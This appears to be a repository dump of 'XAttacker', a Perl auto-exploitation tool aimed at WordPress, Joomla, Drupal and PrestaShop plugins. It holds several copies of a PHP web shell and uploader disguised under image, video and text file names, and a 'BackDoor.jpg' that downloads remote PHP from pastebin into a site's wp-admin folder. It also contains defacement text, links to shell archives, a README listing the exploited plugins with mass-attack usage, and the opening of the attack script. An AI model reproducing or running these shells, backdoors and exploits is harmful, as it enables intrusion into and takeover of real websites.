├── index.jpg ├── XAttacker.html ├── XAttacker.txt ├── XAttacker.html.j ├── Jattack.rar ├── XAttacker.gif ├── XAttacker.zip ├── XAttackerevs.zip ├── wpmobiledetectorshellonline.zip ├── BackDoor.jpg ├── XAttacker.jpg ├── XAttacker.php.mp4 ├── XAttacker.php.png ├── XAttacker.phP3 ├── XAttacker.php ├── XAttacker.php.php.j ├── nvn_extra_add.php ├── README.md └── XAttacker.pl /index.jpg: -------------------------------------------------------------------------------- 1 | HaCKeD BY Mohamed Riahi -------------------------------------------------------------------------------- /XAttacker.html: -------------------------------------------------------------------------------- 1 | HaCKeD BY Mohamed Riahi -------------------------------------------------------------------------------- /XAttacker.txt: -------------------------------------------------------------------------------- 1 | HaCKeD BY Mohamed Riahi -------------------------------------------------------------------------------- /XAttacker.html.j: -------------------------------------------------------------------------------- 1 | HaCKeD BY Mohamed Riahi -------------------------------------------------------------------------------- /Jattack.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/XAttacker/master/Jattack.rar -------------------------------------------------------------------------------- /XAttacker.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/XAttacker/master/XAttacker.gif -------------------------------------------------------------------------------- /XAttacker.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/XAttacker/master/XAttacker.zip -------------------------------------------------------------------------------- /XAttackerevs.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/XAttacker/master/XAttackerevs.zip -------------------------------------------------------------------------------- /wpmobiledetectorshellonline.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/XAttacker/master/wpmobiledetectorshellonline.zip -------------------------------------------------------------------------------- /BackDoor.jpg: -------------------------------------------------------------------------------- 1 | "; 18 | }else 19 | echo "not exits"; 20 | echo "done .\n " ; 21 | $check2 = $_SERVER['DOCUMENT_ROOT'] . "/wp-admin/shapes.php" ; 22 | $text2 = http_get('https://pastebin.com/raw/wDFRMJrx'); 23 | $open2 = fopen($check2, 'w'); 24 | fwrite($open2, $text2); 25 | fclose($open2); 26 | if(file_exists($check2)){ 27 | echo $check2."
"; 28 | }else 29 | echo "not exits2"; 30 | echo "done2 .\n " ; 31 | 32 | 33 | ?> 34 | -------------------------------------------------------------------------------- /XAttacker.jpg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Uname:".php_uname()."
"; 12 | echo ''; 13 | if(isset($_POST['Submit'])){ 14 | $filedir = ""; 15 | $maxfile = '2000000'; 16 | $mode = '0644'; 17 | $userfile_name = $_FILES['image']['name']; 18 | $userfile_tmp = $_FILES['image']['tmp_name']; 19 | if(isset($_FILES['image']['name'])) { 20 | $qx = $filedir.$userfile_name; 21 | @move_uploaded_file($userfile_tmp, $qx); 22 | @chmod ($qx, octdec($mode)); 23 | echo"
Sucess Upload :D ==> $userfile_name
"; 24 | } 25 | } 26 | else{ 27 | echo'

'; 28 | } 29 | echo '
'; 30 | 31 | } 32 | ?> -------------------------------------------------------------------------------- /XAttacker.php.mp4: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Uname:".php_uname()."
"; 12 | echo ''; 13 | if(isset($_POST['Submit'])){ 14 | $filedir = ""; 15 | $maxfile = '2000000'; 16 | $mode = '0644'; 17 | $userfile_name = $_FILES['image']['name']; 18 | $userfile_tmp = $_FILES['image']['tmp_name']; 19 | if(isset($_FILES['image']['name'])) { 20 | $qx = $filedir.$userfile_name; 21 | @move_uploaded_file($userfile_tmp, $qx); 22 | @chmod ($qx, octdec($mode)); 23 | echo"
Sucess Upload :D ==> $userfile_name
"; 24 | } 25 | } 26 | else{ 27 | echo'

'; 28 | } 29 | echo '
'; 30 | 31 | } 32 | ?> -------------------------------------------------------------------------------- /XAttacker.php.png: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Uname:".php_uname()."
"; 12 | echo ''; 13 | if(isset($_POST['Submit'])){ 14 | $filedir = ""; 15 | $maxfile = '2000000'; 16 | $mode = '0644'; 17 | $userfile_name = $_FILES['image']['name']; 18 | $userfile_tmp = $_FILES['image']['tmp_name']; 19 | if(isset($_FILES['image']['name'])) { 20 | $qx = $filedir.$userfile_name; 21 | @move_uploaded_file($userfile_tmp, $qx); 22 | @chmod ($qx, octdec($mode)); 23 | echo"
Sucess Upload :D ==> $userfile_name
"; 24 | } 25 | } 26 | else{ 27 | echo'

'; 28 | } 29 | echo '
'; 30 | 31 | } 32 | ?> -------------------------------------------------------------------------------- /XAttacker.phP3: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Uname:".php_uname()."
"; 12 | echo ''; 13 | if(isset($_POST['Submit'])){ 14 | $filedir = ""; 15 | $maxfile = '2000000'; 16 | $mode = '0644'; 17 | $userfile_name = $_FILES['image']['name']; 18 | $userfile_tmp = $_FILES['image']['tmp_name']; 19 | if(isset($_FILES['image']['name'])) { 20 | $qx = $filedir.$userfile_name; 21 | @move_uploaded_file($userfile_tmp, $qx); 22 | @chmod ($qx, octdec($mode)); 23 | echo"
Sucess Upload :D ==> $userfile_name
"; 24 | } 25 | } 26 | else{ 27 | echo'

'; 28 | } 29 | echo '
'; 30 | 31 | } 32 | ?> -------------------------------------------------------------------------------- /XAttacker.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Uname:".php_uname()."
"; 12 | echo ''; 13 | if(isset($_POST['Submit'])){ 14 | $filedir = ""; 15 | $maxfile = '2000000'; 16 | $mode = '0644'; 17 | $userfile_name = $_FILES['image']['name']; 18 | $userfile_tmp = $_FILES['image']['tmp_name']; 19 | if(isset($_FILES['image']['name'])) { 20 | $qx = $filedir.$userfile_name; 21 | @move_uploaded_file($userfile_tmp, $qx); 22 | @chmod ($qx, octdec($mode)); 23 | echo"
Sucess Upload :D ==> $userfile_name
"; 24 | } 25 | } 26 | else{ 27 | echo'

'; 28 | } 29 | echo '
'; 30 | 31 | } 32 | ?> -------------------------------------------------------------------------------- /XAttacker.php.php.j: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Uname:".php_uname()."
"; 12 | echo ''; 13 | if(isset($_POST['Submit'])){ 14 | $filedir = ""; 15 | $maxfile = '2000000'; 16 | $mode = '0644'; 17 | $userfile_name = $_FILES['image']['name']; 18 | $userfile_tmp = $_FILES['image']['tmp_name']; 19 | if(isset($_FILES['image']['name'])) { 20 | $qx = $filedir.$userfile_name; 21 | @move_uploaded_file($userfile_tmp, $qx); 22 | @chmod ($qx, octdec($mode)); 23 | echo"
Sucess Upload :D ==> $userfile_name
"; 24 | } 25 | } 26 | else{ 27 | echo'

'; 28 | } 29 | echo '
'; 30 | 31 | } 32 | ?> -------------------------------------------------------------------------------- /nvn_extra_add.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Uname:".php_uname()."
"; 12 | echo ''; 13 | if(isset($_POST['Submit'])){ 14 | $filedir = ""; 15 | $maxfile = '2000000'; 16 | $mode = '0644'; 17 | $userfile_name = $_FILES['image']['name']; 18 | $userfile_tmp = $_FILES['image']['tmp_name']; 19 | if(isset($_FILES['image']['name'])) { 20 | $qx = $filedir.$userfile_name; 21 | @move_uploaded_file($userfile_tmp, $qx); 22 | @chmod ($qx, octdec($mode)); 23 | echo"
Sucess Upload :D ==> $userfile_name
"; 24 | } 25 | } 26 | else{ 27 | echo'

'; 28 | } 29 | echo '
'; 30 | 31 | } 32 | ?> -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |
  2 | 
  3 |              .o oOOOOOOOo                                            OOOo
  4 |              Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
  5 |              OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
  6 |              OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
  7 |              `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
  8 |              .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
  9 |              OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
 10 |             oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
 11 |            oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 12 |           OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 13 |           "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
 14 |              Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
 15 |              :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?
 16 |                           oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
 17 |                           '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
 18 |                                `$"  `OOOO' `O"Y ' `OOOO'  o
 19 |                                       OP"          : o
 20 |                        [ X Attacker v2.0 ][ Coded By Mohamed Riahi ]
 21 |                            [ Start At Tue Nov  7 12:30:48 2017 ]
 22 | 
23 |

Installation

24 | git clone https://github.com/Moham3dRiahi/XAttacker.git

25 |

X Attacker

26 | 27 | X Attacker Tool ☣ Website Vulnerability Scanner & Auto Exploiter 28 | 29 | 30 | [+] Auto Cms Detect 31 | 32 | [1] WordPress :
33 | 34 | [+] Adblock Blocker
35 | [+] WP All Import
36 | [+] Blaze
37 | [+] Catpro
38 | [+] Cherry Plugin 39 | [+] Download Manager 40 | [+] Formcraft 41 | [+] Power Zoomer 42 | [+] Gravity Forms 43 | [+] Revslider Upload Shell 44 | [+] Revslider Dafece Ajax 45 | [+] Revslider Get Config 46 | [+] Showbiz 47 | [+] Simple Ads Manager 48 | [+] Slide Show Pro 49 | [+] WP Mobile Detector 50 | [+] Wysija 51 | [+] InBoundio Marketing 52 | [+] dzs-zoomsounds 53 | [+] Reflex Gallery 54 | [+] Creative Contact Form 55 | [+] Work The Flow File Upload 56 | [+] WP Job Manger 57 | [+] PHP Event Calendar 58 | [+] Synoptic 59 | [+] Wp Shop 60 | [+] Content Injection 61 | 62 | [2] Joomla
63 | 64 | [+] Com Jce 65 | [+] Com Media 66 | [+] Com Jdownloads 67 | [+] Com Fabrik 68 | [+] Com Jdownloads Index 69 | [+] Com Foxcontact 70 | [+] Com Ads Manager 71 | [+] Com Blog 72 | [+] Com Users 73 | [+] Com Weblinks
74 | [+] mod_simplefileupload 75 | 76 | [3] DruPal
77 | 78 | [+] Add Admin 79 | 80 | [4] PrestaShop
81 | 82 | [+] columnadverts 83 | [+] soopamobile 84 | [+] soopabanners 85 | [+] Vtermslideshow 86 | [+] simpleslideshow 87 | [+] productpageadverts 88 | [+] homepageadvertise 89 | [+] homepageadvertise2 90 | [+] jro_homepageadvertise 91 | [+] attributewizardpro 92 | [+] 1attributewizardpro 93 | [+] AttributewizardproOLD 94 | [+] attributewizardpro_x 95 | [+] advancedslider 96 | [+] cartabandonmentpro 97 | [+] cartabandonmentproOld 98 | [+] videostab 99 | [+] wg24themeadministration 100 | [+] fieldvmegamenu 101 | [+] wdoptionpanel 102 | [+] pk_flexmenu 103 | [+] pk_vertflexmenu 104 | [+] nvn_export_orders 105 | [+] megamenu 106 | [+] tdpsthemeoptionpanel 107 | [+] psmodthemeoptionpanel 108 | [+] masseditproduct 109 | 110 | [5] Lokomedia
111 | 112 | SQL injection 113 | 114 |

Video

115 | 116 | 117 |

Usage

118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 |
Short FormLong FormDescription
-l--listwebsites list
134 |

Example

135 | perl XAttacker.pl -l list.txt 136 |

for coloring in windows Add This Line
137 | use Win32::Console::ANSI; 138 |
139 | 140 | ⚠ Warning ⚠
141 | Don't forget update time every month in line 37
142 | Don't forget check online tools in line 1081 and 3256
143 | 144 |

Version

145 | Current version is 2.0 146 | What's New 147 |

• speed up

148 |

• Bug fixes

149 | 150 | version 1.9 151 |

• Bug fixes

152 | -------------------------------------------------------------------------------- /XAttacker.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | #Coded By Mohamed Riahi 10/10/2017 4 | #don't Change my Fucking Rights 5 | 6 | #past here 7 | use Getopt::Long; 8 | use HTTP::Request; 9 | use LWP::UserAgent; 10 | use IO::Select; 11 | use HTTP::Cookies; 12 | use HTTP::Response; 13 | use Term::ANSIColor; 14 | use HTTP::Request::Common qw(POST); 15 | use HTTP::Request::Common qw(GET); 16 | use URI::URL; 17 | use IO::Socket::INET; 18 | my $ua = LWP::UserAgent->new; 19 | $ua->timeout(10); 20 | 21 | GetOptions( 22 | "l|list=s" => \$list, 23 | ); 24 | 25 | unless ($list) { help(); } 26 | 27 | 28 | sub help { 29 | print q( 30 | Usage: perl XAttacker.pl -l list.txt 31 | OPTIONS: 32 | -l => websites list 33 | ); 34 | exit;} 35 | 36 | my $year = "2017"; 37 | my $month = "11"; 38 | my $datetime = localtime; 39 | 40 | system("title X Attacker v2.0"); 41 | if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); } 42 | print color('bold green'); 43 | 44 | $tmp="tmp"; 45 | if (-e $tmp) 46 | { 47 | } 48 | else 49 | { 50 | mkdir $tmp or die "Error creating directory: $tmp"; 51 | } 52 | 53 | $rez="Result"; 54 | if (-e $rez) 55 | { 56 | } 57 | else 58 | { 59 | mkdir $rez or die "Error creating directory: $rez"; 60 | } 61 | 62 | 63 | 64 | print q( 65 | .o oOOOOOOOo OOOo 66 | Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO 67 | OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO 68 | OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB' 69 | `O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo 70 | .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO 71 | OOOOO '"OOOOOOOOOOOOOOOO"` oOO 72 | oOOOOOba. .adOOOOOOOOOOba .adOOOOo. 73 | oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO 74 | OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO 75 | "OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO" 76 | Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :` 77 | : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? 78 | oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo 79 | '%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO': 80 | `$" `OOOO' `O"Y ' `OOOO' o 81 | OP" : o 82 | ); 83 | 84 | print color('reset'); 85 | print " "; 86 | print colored ("[ X Attacker v2.0 ]",'white on_red'); 87 | print colored ("[ Coded By Mohamed Riahi ]\n",'white on_red'); 88 | print " "; 89 | print colored ("[ Start At $datetime ]",'white on_red'),"\n\n"; 90 | 91 | $a = 0; 92 | open (THETARGET, "<$list") || die "[-] Can't open the file"; 93 | @TARGETS = ; 94 | close THETARGET; 95 | $link=$#TARGETS + 1; 96 | 97 | 98 | print color("bold white"), "[+] Total sites : "; 99 | print color("bold red"), "".scalar(@TARGETS)."\n\n"; 100 | print color('reset'); 101 | 102 | OUTER: foreach $site(@TARGETS){ 103 | chomp($site); 104 | $a++; 105 | cms(); 106 | } 107 | 108 | ################ CMS DETCTER ##################### 109 | sub cms(){ 110 | $ua = LWP::UserAgent->new(keep_alive => 1); 111 | $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"); 112 | $ua->timeout (15); 113 | $lokomedia = "$site/smiley/1.gif"; 114 | my $lokomediacms = $ua->get("$lokomedia")->content_type; 115 | $loko = "$site/rss.xml"; 116 | my $lokomediacmstow = $ua->get("$loko")->content; 117 | my $cms = $ua->get("$site")->content; 118 | 119 | if($cms =~/